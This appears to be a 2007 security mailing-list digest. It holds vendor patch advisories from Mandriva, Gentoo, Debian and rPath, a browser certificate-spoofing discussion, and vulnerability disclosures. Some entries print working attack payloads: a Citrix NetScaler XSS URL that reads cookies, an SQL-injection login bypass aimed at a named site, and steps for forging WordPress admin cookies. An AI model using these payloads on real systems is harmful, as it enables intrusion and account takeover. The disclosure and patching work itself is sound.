[ MDKSA-2007:226 ] - Updated kernel packages fix multiple vulnerabilities and bugs

[security]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

 ___
 
 Mandriva Linux Security Advisory MDKSA-2007:226
 http://www.mandriva.com/security/
 ___
 
 Package : kernel
 Date: November 19, 2007
 Affected: 2008.0
 ___
 
 Problem Description:
 
 Some vulnerabilities were discovered and corrected in the Linux
 2.6 kernel:
 
 The minix filesystem code allows local users to cause a denial of
 service (hang) via a malformed minix file stream (CVE-2006-6058).
 
 An integer underflow in the Linux kernel prior to 2.6.23 allows remote
 attackers to cause a denial of service (crash) via a crafted SKB length
 value in a runt IEEE 802.11 frame when the IEEE80211_STYPE_QOS_DATA
 flag is set (CVE-2007-4997).
 
 To update your kernel, please follow the directions located at:
 
   http://www.mandriva.com/en/security/kernelupdate
 ___

 References:
 
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6058
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4997
 ___
 
 Updated Packages:
 
 Mandriva Linux 2008.0:
 bfb8abfb7532255d239ce8ef3b39966b  
2008.0/i586/kernel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 c68305809aa8704146ea1a59cd687ab1  
2008.0/i586/kernel-desktop-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 89a439f86bd47820345287275fe25674  
2008.0/i586/kernel-desktop-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 a13eab853fc0b044456d90d98c8e9008  
2008.0/i586/kernel-desktop-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 229f00634e286da1ab490678cf201dab  
2008.0/i586/kernel-desktop-latest-2.6.22.9-2mdv2008.0.i586.rpm
 e77c3f728f0ba5bf8491e27ef389df8c  
2008.0/i586/kernel-desktop586-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 82d8110dc838a1a25b2d4de0e94872e3  
2008.0/i586/kernel-desktop586-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 0be66b6c155ff5888900f784bf21f555  
2008.0/i586/kernel-desktop586-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 48976bcfb3ecd30b2c2a671e49f2d241  
2008.0/i586/kernel-desktop586-latest-2.6.22.9-2mdv2008.0.i586.rpm
 372de082e77dec0e87d93f389bff76cf  
2008.0/i586/kernel-doc-2.6.22.9-2mdv2008.0.i586.rpm
 8fb68460352343d0c14b3d2c5581375f  
2008.0/i586/kernel-laptop-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 0c76031c7eb78ba7da93b83ebf531541  
2008.0/i586/kernel-laptop-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 059f66f5340e538dda3d748276313975  
2008.0/i586/kernel-laptop-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 4d6c700c736a476718c809fb3a470ed9  
2008.0/i586/kernel-laptop-latest-2.6.22.9-2mdv2008.0.i586.rpm
 57e0382893adc64445913de674815ad5  
2008.0/i586/kernel-server-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 f2ea96b6c7f83f8de0f27dc1c2ea9193  
2008.0/i586/kernel-server-devel-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 4de3613951fda9c4c92fcb35fe743a04  
2008.0/i586/kernel-server-devel-latest-2.6.22.9-2mdv2008.0.i586.rpm
 4cc8313e4fed4a1a966bc4f4d0819f71  
2008.0/i586/kernel-server-latest-2.6.22.9-2mdv2008.0.i586.rpm
 a30a7a388cdcdf089c39f7a7c26e34f0  
2008.0/i586/kernel-source-2.6.22.9-2mdv-1-1mdv2008.0.i586.rpm
 5b919908b67f94571a4851caf08e8ece  
2008.0/i586/kernel-source-latest-2.6.22.9-2mdv2008.0.i586.rpm 
 6e797fd0fea50e2b0290ca082ca9c1db  
2008.0/SRPMS/kernel-2.6.22.9-2mdv2007.0.src.rpm

 Mandriva Linux 2008.0/X86_64:
 d30b2a76ab4e37f296f07380fa8d41a4  
2008.0/x86_64/kernel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 3cdbd2356b7400f831a8b759d13952ec  
2008.0/x86_64/kernel-desktop-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 a60abdec0274a9f96be2fb1117eb2f4a  
2008.0/x86_64/kernel-desktop-devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 272ac8a552c99a1b72303a92f474d46f  
2008.0/x86_64/kernel-desktop-devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 8c78406bc678b51a4c84526b0874703e  
2008.0/x86_64/kernel-desktop-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 8447a07d292dd930bba13a6d06bf6570  
2008.0/x86_64/kernel-doc-2.6.22.9-2mdv2008.0.x86_64.rpm
 546663f7f08a1ed4a0e561c06960872e  
2008.0/x86_64/kernel-laptop-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 482b6130e1695693ebfd610aade49255  
2008.0/x86_64/kernel-laptop-devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 280678d50696a95f56735ad91fcc92ef  
2008.0/x86_64/kernel-laptop-devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 f4fedb72b7d286f9b9dae772b8251a7a  
2008.0/x86_64/kernel-laptop-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 c811160740d5c4e138430fb757803bcc  
2008.0/x86_64/kernel-server-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 1078b15d6cb4a1c420e7212d4a7ca545  
2008.0/x86_64/kernel-server-devel-2.6.22.9-2mdv-1-1mdv2008.0.x86_64.rpm
 e127a24e39d458865ebc54e61a7db34b  
2008.0/x86_64/kernel-server-devel-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 347576ae981042a8277c2adcdb433cfc  
2008.0/x86_64/kernel-server-latest-2.6.22.9-2mdv2008.0.x86_64.rpm
 464e4b918285dac78af1b2521ebac461  
20

Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2

[Michal Zalewski]

On Tue, 20 Nov 2007, Kapetanakis Giannis wrote:

> I would consider this a feature of the X509 standard and not a bug.

The behavior is remarkably counterintuitive. It could be reasonably
expected for the browser to properly communicate the situation (show a
list of aliases) to the user, or better yet, to initially bind non-trusted
certs to their originating domain only, at least until an explicit desire
to extend their authority is expressed by the user.

What the standard says is immaterial - it is not expected to anticipate
that we might live in an world where scores of low-budget, non-sensitive
sites use self-signed certs - but it's unreasonable to expect any user to
refrain from visiting some page *at all* just because of a certificate
warning (he should be wary of the content therein, of course, but so
what).

If any attempt to visit such a page bears an inherent, undisclosed risk -
other than the page itself possibly being bogus, of course - there's a bug
to be fixed.

> If a user is fool enough to accept lame certs (even temporary) and then
> later on send his private data in secure sites without checking the
> certificate (at least the CN which yells the difference) then he
> probably asked for it.

The Web is used by close to a billion people who do not necessarily check
the details of SSL certs, or inspect all HTTP headers, on *every single*
login to their webmail or online banking site.

We may perhaps blame them if they click through clear and concise security
warnings, or subvert other measures, and willingly consent to an
unnecessary risk - but when they rely on the expertise of browser vendors
to know that something is wrong, and get burned - well, it's not their
fault.

/mz

Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2

[Graeme Fowler]

Hi

On Tue, 2007-11-20 at 00:51 +0200, Kapetanakis Giannis wrote:
> ps. I've just discovered this:
> http://www.g-loaded.eu/2007/08/10/ssl-enabled-name-based-apache-virtual-hosts-with-mod_gnutls/
> 
> rfc3546 defines Server Name Indication (SNI) extention
> which is used by mod_gnutls for tls name based virtual hosting.
> Looks interesting :)

Also in OpenSSL. Use a recent snapshot and enable "--enable-tlsext" at
configure time. It'll be in the next 0.9.8 update, if I read the mailing
lists correctly.

Graeme

Re: Certificate spoofing issue with Mozilla, Konqueror, Safari 2

[Kapetanakis Giannis]

On Sun, 18 Nov 2007, Nils Toedtmann wrote:


Mozilla based browsers (Firefox, Netscape, ...), Konqueror and Safari 2
do not bind a user-approved webserver certificate to the originating
domain name. This makes the user vulnerable to certificate spoofing by
"subjectAltName:dNSName" extensions.

...
In the end, the cert warning and the spoofing attempt get separated into
two events which appear to the user as being unrelated. I consider this
a severe cert-spoofing issue, aggravated by the fact that affected
browsers also match any hostname with "subjectAltName:dNSName=*".

Regards, /nils.


I would consider this a feature of the X509 standard and not a bug.
subjectAltName and wildcard matching exists primarily for name based
virtual hosting in SSL/TLS. There is no other way you could do this
without this extention. (*correction -> check bottom*)

If a user is fool enough to accept lame certs (even temporary)
and then later on send his private data in secure sites without
checking the certificate (at least the CN which yells the difference)
then he probably asked for it.

If there was a warning that the CN is different
than the hostname requested then subjectAltName flexibility would 
be useless. In temporary saves the CN could be binded to a unique hostname

but in permanent saves this would be a problem.

I agree with you that subjectAltName should be 
presented together with the CN in the front page of the cert info

as both attributes share the same importance.
It shouldn't be too hidden as it is now. However it is visible.

Having said that I still believe that since the user accepted the cert
he decides to trust it. The user trusts the (whole) certificate not the 
browser.

The user tells the browser I want www.example.com *.example.com and
*.foo.bar to be trusted under this certifacate. The browser obays as it 
should.


regards,

Giannis
ps. I've just discovered this:
http://www.g-loaded.eu/2007/08/10/ssl-enabled-name-based-apache-virtual-hosts-with-mod_gnutls/

rfc3546 defines Server Name Indication (SNI) extention
which is used by mod_gnutls for tls name based virtual hosting.
Looks interesting :)

[ GLSA 200711-28 ] Perl: Buffer overflow

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-28
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Perl: Buffer overflow
  Date: November 19, 2007
  Bugs: #198196
ID: 200711-28

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


A buffer overflow in the Regular Expression engine in Perl possibly
allows for the execution of arbitrary code.

Background
==

Perl is a stable, cross-platform programming language created by Larry
Wall.

Affected packages
=

---
 Package/  Vulnerable  /Unaffected
---
  1  dev-lang/perl < 5.8.8-r4  >= 5.8.8-r4

Description
===

Tavis Ormandy and Will Drewry (Google Security Team) discovered a
heap-based buffer overflow in the Regular Expression engine (regcomp.c)
that occurs when switching from byte to Unicode (UTF-8) characters in a
regular expression.

Impact
==

A remote attacker could either entice a user to compile a specially
crafted regular expression or actively compile it in case the script
accepts remote input of regular expressions, possibly leading to the
execution of arbitrary code with the privileges of the user running
Perl.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Perl users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=dev-lang/perl-5.8.8-r4"

References
==

  [ 1 ] CVE-2007-5116
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5116

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-28.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.7 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHQfvSuhJ+ozIKI5gRAvsEAJ4xdMYdYOWV1neFOchsoCtz3sUtGwCggFQg
RVShInUYsQgHfjeb1K1xnE4=
=wi9y
-END PGP SIGNATURE-

rPSA-2007-0242-1 php5 php5-cgi php5-mysql php5-pear php5-pgsql php5-soap php5-xsl

[rPath Update Announcements]

rPath Security Advisory: 2007-0242-1
Published: 2007-11-19
Products:
rPath Appliance Platform Linux Service 1
rPath Linux 1

Rating: Minor
Exposure Level Classification:
Remote Deterministic Denial of Service
Updated Versions:
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1
[EMAIL PROTECTED]:1/5.2.5-1-1

rPath Issue Tracking System:
https://issues.rpath.com/browse/RPL-1943

References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4887
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4783
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4840
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5898
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5899
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5900

Description:
Previous versions of the php5 package contain multiple vulnerabilities,
the most serious of which involve several Denial of Service attacks
(application crashes and temporary application hangs).  It is not
currently known that these vulnerabilities can be exploited to execute
malicious code.

In its default configuration, rPath Linux 1 does not install php5 and
is thus not vulnerable; however, systems upon which php5 and an exposed
application have been installed may be vulnerable.

http://wiki.rpath.com/Advisories:rPSA-2007-0242

Copyright 2007 rPath, Inc.
This file is distributed under the terms of the MIT License.
A copy is available at http://www.rpath.com/permanent/mit-license.html

Alcatel OmniPCX Enterprise VoIP Vulnerability

[daniel . stirnimann]

#

#

# COMPASS SECURITY ADVISORY http://www.csnc.ch/

#

#

#

# Product: OmniPCX Enterprise

# Vendor:  Alcatel

# Subject: VoIP Phone Audio Stream Rerouting Vulnerability

# Risk High

# Effect   Currently exploitable

# Author:  Daniel Stirnimann (daniel.stirnimann (at) csnc (dot) ch)

# Date:November, 19th 2007

#

#


Introduction:

-

If a malicious user sends a TFTP request to the

signaling server with the MAC address of the

victim’s VoIP phone as part of the file name, he

is able to reroute only the audio stream coming

from the other end of the call to his computers IP

address.

Even though an Alcatel VoIP phone can make or take

calls, and send audio, it is prevented from hearing anything said at the other 
end of the

communication. The VoIP phone needs to be rebooted

manually in order to work again.


This vulnerability may be further exploited by

rerouting the audio stream to the victim’s VoIP

phone again. This would only allow the malicious

user to eavesdrop on half of the victim's audio

communication: what the victim says is not

intercepted, only on the answers made by the other

party would be overheard. Note, this scenario has

not been verified.


Vulnerable:

---

Alcatel OmniPCX Enterprise release 7.1 and earlier


Not vulnerable:

---

Alcatel OmniPCX Enterprise release 8.0


Vulnerability Management:

-

June 2007: Vulnerability found

June 2007: Alcatel Security notified

November 2007: Alcatel Advisory available

November 2007: Alcatel Security Information


Alcatel-Lucent information:

---

http://www1.alcatel-lucent.com/psirt/statements.htm

Number 2007004


Reference:

http://www.csnc.ch/static/advisory/secadvisorylist.html

Wordpress Cookie Authentication Vulnerability

[Steven J. Murdoch]

Wordpress Cookie Authentication Vulnerability

Original release date: 2007-11-19
Last revised: 2007-11-19
Latest version: 
http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-auth.txt
CVE ID: 
Source: Steven J. Murdoch 


Systems Affected:

 Wordpress 1.5 -- 2.3.1 (including current version, as of 2007-11-19)


Overview:

 With read-only access to the Wordpress database, it is possible to
 generate a valid login cookie for any account, without resorting to a
 brute force attack. This allows a limited SQL injection vulnerability
 to be escalated into administrator access.

 This vulnerability is known to be actively exploited, hence the
 expedited public release.


I. Description

 For authentication, the Wordpress user database stores the MD5 hash
 of login passwords. A client is permitted access if they can present a
 password whose hash matches the stored one.

 $ mysql -u wordpress -p wordpress
   Enter password: 

   mysql> SELECT ID, user_login, user_pass FROM wp_users;
   ++-+--+
   | ID | user_login  | user_pass|
   ++-+--+
   |  1 | admin   | 4cee2c84f6de6d89a4db4f2894d14e38 |
   ...

 Of course, entering your password after each action that requires
 authorization would be exceptionally tedious. So, after logging in,
 Wordpress presents the client with two cookies:

  wordpressuser_6092254072ca971c70b3ff302411aa5f=admin
  
wordpresspass_6092254072ca971c70b3ff302411aa5f=813cadd8658c4776afbe5de8f304a684

 The cookie names contains the MD5 hash (6092...1a5f) of the blog URL.
 The value of wordpressuser_... is the login name, and the value of
 wordpresspass is the double-MD5 hash of the user password.

 Wordpress will permit access to a given user account if the
 wordpressuserpass_... cookie matches the hash of the specified user's
 wp_users.user_pass database entry.

 In other words, the database contains MD5(password) and the cookie
 contains MD5(MD5(password)). It is thus trivial to convert a database
 entry into an authentication cookie.

 At this point the vulnerability should be clear. If an attacker can
 gain read access to the wp_user table, for example due to a publicly
 visible backup or SQL injection vulnerability, a valid cookie can be
 generated for any account. 

 This applies even if the user's password is sufficiently complex to
 resist brute force and rainbow table attacks. While it should be
 computationally infeasible to go backwards from MD5(password) to
 password, the attacker needs only to go forwards.

 The exploitation steps are therefore:
  1) Find the hash of the blog URL: Either just look at the URL, or
 create an account to get a user cookie
  2) Read the user_pass entry from wp_users table: Look for
 backups, perform SQL injection, etc...
  3) Set the following cookies:
  wordpressuser_=admin
  wordpresspass_=MD5(user_pass)
  4) You have admin access to the blog


II. Impact

 A remote attacker, with read access to the password database can gain
 administrator rights. This may be used in conjunction with an SQL
 injection attack, or after locating a database backup.

 An attacker who has alternatively compromised the database of one
 Wordpress blog can also gain access to any other whose users have the
 same password on both.


III. Solution

 No vendor patch is available.
 No timeline for a vendor patch has been announced.

 Workarounds:

 - Protect the Wordpress database, and do not allow backups to be
   released.
 - Keep your Wordpress installation up to date. This should reduce the
   risk that your database will be compromised.
 - Do not share passwords across different sites.
 - If you suspect a database to be compromised, change all passwords
   to different ones. It is not adequate to change the passwords to
   the same ones, since Wordpress does not "salt" [1] the password
   database.
 - Remove write permissions on the Wordpress files for the system
   account that the webserver runs as. This will disable the theme
   editor, but make it more difficult to escalate Wordpress
   administrator access into the capability to execute arbitrary code
 - Configure the webserver to not execute files in any directory
   writable by the webserver system account (e.g. the upload
   directory).

 Potential fixes:

  The problem occurs because it is easy to go from the password hash
  in the database to a cookie (i.e the application of MD5 is the wrong
  way around). The simplest fix is to store MD5(MD5(password)) in the
  database, and make the cookie MD5(password). This still makes it
  infeasible to retrieve the password from a cookie, but means that it
  is also infeasible to generate a valid cookie from the database
  entry.

  However, there are other vulnerabilities in the Wordpress cookie and
  password handling, which should be resolved too:

  - Passwords are unsalted [2

Certificate spoofing issue with Mozilla, Konqueror, Safari 2

[Nils Toedtmann]

Moin *

Mozilla based browsers (Firefox, Netscape, ...), Konqueror and Safari 2
do not bind a user-approved webserver certificate to the originating
domain name. This makes the user vulnerable to certificate spoofing by
"subjectAltName:dNSName" extensions. 

I set up a demonstration at , check it out. For
details (vulnerable versions, vendor status, bug ids ...) see 



Attack scenario:

(1) Assumed a phisher could redirect a user's browser to his prepared
https webserver spoofing "www.paypal.com" (by DNS spoofing or domain
hijacking or other MITM attack). But the user's browser would raise
an "unknown CA" warning because the phisher does not have a
certificate for "www.paypal.com" issued by a browser-trusted CA
(that's what X.509 and TLS is all about!). Thus, the phisher defers
this step.

(2) The phisher creates another website "www.example.com" (not spoofed)
and a home brewed X.509 cert:

DN="CN=www.example.com"
subjectAltName:dNSName=www.example.com
subjectAltName:dNSName=www.paypal.com

and lures the user to https://www.example.com/. The user gets an
"unknown CA" warning, but the "subjectAltName:dNSName" extensions
are not shown to him, so the cert looks ok. As he does not plan to
enter any private information, he accepts it (temporarily or
permanently) and proceeds.

(3) Any time later (if the cert got accepted temporarily this has to
happen within the same session), the phisher lures the user to his
spoofed https://www.paypal.com/, using the very same self-signed
certificate - NO WARNING!

In the end, the cert warning and the spoofing attempt get separated into
two events which appear to the user as being unrelated. I consider this
a severe cert-spoofing issue, aggravated by the fact that affected
browsers also match any hostname with "subjectAltName:dNSName=*".

For Mozilla, this issue is known for more than three years without being
fixed.

Regards, /nils.

Citrix NetScaler Web Management XSS

[nnposter]

Citrix NetScaler Web Management XSS



Product: Citrix NetScaler

http://www.citrix.com/lang/English/ps2/index.asp



Citrix NetScaler contains a cross-site scripting vulnerability in the web 
management interface. None of the parameter values of /ws/generic_api_call.pl 
are sanitized before they get embedded in the HTML output. As an example, 
parameter "standalone" can be exploited as follows:


http://(target)/ws/generic_api_call.pl?function=statns&standalone=%3c/script%3e%3cscript%3ealert(document.cookie)%3c/script%3e%3cscript%3e



The vulnerability has been identified in version 8.0, build 47.8.

However, other versions may be also affected.



Solution:

Do not stay logged into the NetScaler web management interface while browsing 
other web sites.



Found by:

nnposter

Re: IceBB 1.0rc6 <= Remote SQL Injection

[aeroxteam-nospam]

correction


[|Exploit:|]

http://www.aeroxteam.fr/exploit-IceBB-1.0rc6.txt

[Aria-Secutiy Net] Click&BaneX SQL Injection

[no-reply]

---

Aria-Security Team,

http://Aria-Security.net

---

Shout Outs: AurA, imm02tal

http://icash.ch/index.html?ClickAndRank/details.asp


Username: anything' OR 'x'='x

Password: anything' OR 'x'='x



Regards,

The-0utl4w

>From Aria-Security.Net

[SECURITY] [DSA 1407-1] New cupsys packages fix arbitrary code execution

[Moritz Muehlenhoff]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- 
Debian Security Advisory DSA 1407-1  [EMAIL PROTECTED]
http://www.debian.org/security/   Moritz Muehlenhoff
November 18, 2007 http://www.debian.org/security/faq
- 

Package: cupsys
Vulnerability  : buffer overflow
Problem type   : remote
Debian-specific: no
CVE Id(s)  : CVE-2007-4351

Alin Rad Pop discovered that the Common UNIX Printing System is
vulnerable to an off-by-one buffer overflow in the code to process IPP
packets, which may lead to the execution of arbitrary code.

For the stable distribution (etch), this problem has been fixed in
version 1.2.7-4etch1. Updated packages for the arm architecure will be
provided later.

The cupsys version in the old stable distribution (sarge) is not
vulnerable to arbitrary code execution.

We recommend that you upgrade your cupsys packages.

Upgrade instructions
- 

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.


Debian GNU/Linux 4.0 alias etch
- ---

Stable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, 
mipsel, powerpc, s390 and sparc.

Source archives:

  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7.orig.tar.gz
Size/MD5 checksum:  4214272 c9ba33356e5bb93efbcf77b6e142e498
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1.diff.gz
Size/MD5 checksum:   102236 6a73afdc41561116f156326fd9d7fd0a
  http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1.dsc
Size/MD5 checksum: 1084 0331998422b6b0e7d8461050918762a0

Architecture independent packages:

  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-common_1.2.7-4etch1_all.deb
Size/MD5 checksum:   892958 b72f4306cdcc411968bc54491ac6696b
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-gnutls10_1.2.7-4etch1_all.deb
Size/MD5 checksum:45176 6ca4f99c22bf3e6eec0079e8a01a68ef

alpha architecture (DEC Alpha)

  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:  1096368 6523296d1d1613a7cfd36bd265c974f7
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2-dev_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:   184368 c7e3133c196127974d6b71c67358c246
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:39260 b8d5365d556d5b64963e3b6178d68b22
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:86290 45dfb12be30b25e61cf8bf460e97911e
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:   174548 b1ee2a0d2bb0735d0b2bbf7c0e40476e
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:94398 15b3f227f555b1941989759912973848
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:  1608552 b80b721d60e124eb4c05f435030871ea
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch1_alpha.deb
Size/MD5 checksum:72420 6737d2589f6a677163c4c87e635dd0fd

amd64 architecture (AMD x86_64 (AMD64))

  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-dbg_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:  1085590 2be48ac8d50f01f7ecf2a5b114ec6d05
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsys2_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:   161610 4239e0f75c12f2210a3df46906dcd04c
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:85250 0ea980db61895312baaf357a226bf184
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-client_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:80708 cefeab800fbd1e48171372203d23f603
  
http://security.debian.org/pool/updates/main/c/cupsys/libcupsimage2-dev_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:52852 af100770f7496a6e3ab8d03283c3c170
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:  1574368 fbcc426835208cdf90a16c2d8d876ea5
  
http://security.debian.org/pool/updates/main/c/cupsys/cupsys-bsd_1.2.7-4etch1_amd64.deb
Size/MD5 checksum:36356 4ced6fa9d3fa0f490d42b706d6fbc2d7
  
http://security.debian.org/pool/updates/main/c/

[ GLSA 200711-22 ] Poppler, KDE: User-assisted execution of arbitrary code

[Pierre-Yves Rofes]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory   GLSA 200711-22
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
 Title: Poppler, KDE: User-assisted execution of arbitrary code
  Date: November 18, 2007
  Bugs: #196735, #198409
ID: 200711-22

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis


Poppler and various KDE components are vulnerable to multiple memory
management issues possibly resulting in the execution of arbitrary
code.

Background
==

Poppler is a cross-platform PDF rendering library originally based on
Xpdf. KOffice is an integrated office suite for KDE. KWord is the
KOffice word processor. KPDF is a KDE-based PDF viewer included in the
kdegraphics package.

Affected packages
=

---
 Package   /  Vulnerable  / Unaffected
---
  1  app-text/poppler < 0.6.1-r1   >= 0.6.1-r1
  2  kde-base/kpdf< 3.5.8-r1  *>= 3.5.7-r3
   >= 3.5.8-r1
  3  kde-base/kdegraphics < 3.5.8-r1  *>= 3.5.7-r3
   >= 3.5.8-r1
  4  app-office/kword < 1.6.3-r2   >= 1.6.3-r2
  5  app-office/koffice   < 1.6.3-r2   >= 1.6.3-r2
---
 5 affected packages on all of their supported architectures.
---

Description
===

Alin Rad Pop (Secunia Research) discovered several vulnerabilities in
the "Stream.cc" file of Xpdf: An integer overflow in the
DCTStream::reset() method and a boundary error in the
CCITTFaxStream::lookChar() method, both leading to heap-based buffer
overflows (CVE-2007-5392, CVE-2007-5393). He also discovered a boundary
checking error in the DCTStream::readProgressiveDataUnit() method
causing memory corruption (CVE-2007-4352). Note: Gentoo's version of
Xpdf is patched to use the Poppler library, so the update to Poppler
will also fix Xpdf.

Impact
==

By enticing a user to view or process a specially crafted PDF file with
KWord or KPDF or a Poppler-based program such as Gentoo's viewers Xpdf,
ePDFView, and Evince or the CUPS printing system, a remote attacker
could cause an overflow, potentially resulting in the execution of
arbitrary code with the privileges of the user running the application.

Workaround
==

There is no known workaround at this time.

Resolution
==

All Poppler users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-text/poppler-0.6.1-r1"

All KPDF users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=kde-base/kpdf-3.5.7-r3"

All KDE Graphics Libraries users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=kde-base/kdegraphics-3.5.7-r3"

All KWord users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/kword-1.6.3-r2"

All KOffice users should upgrade to the latest version:

# emerge --sync
# emerge --ask --oneshot --verbose ">=app-office/koffice-1.6.3-r2"

References
==

  [ 1 ] CVE-2007-4352
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4352
  [ 2 ] CVE-2007-5392
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5392
  [ 3 ] CVE-2007-5393
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5393

Availability


This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200711-22.xml

Concerns?
=

Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users machines is of utmost
importance to us. Any security concerns should be addressed to
[EMAIL PROTECTED] or alternatively, you may file a bug at
http://bugs.gentoo.org.

License
===

Copyright 2007 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).

The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.

http://creativecommons.org/licenses/by-sa/2.5
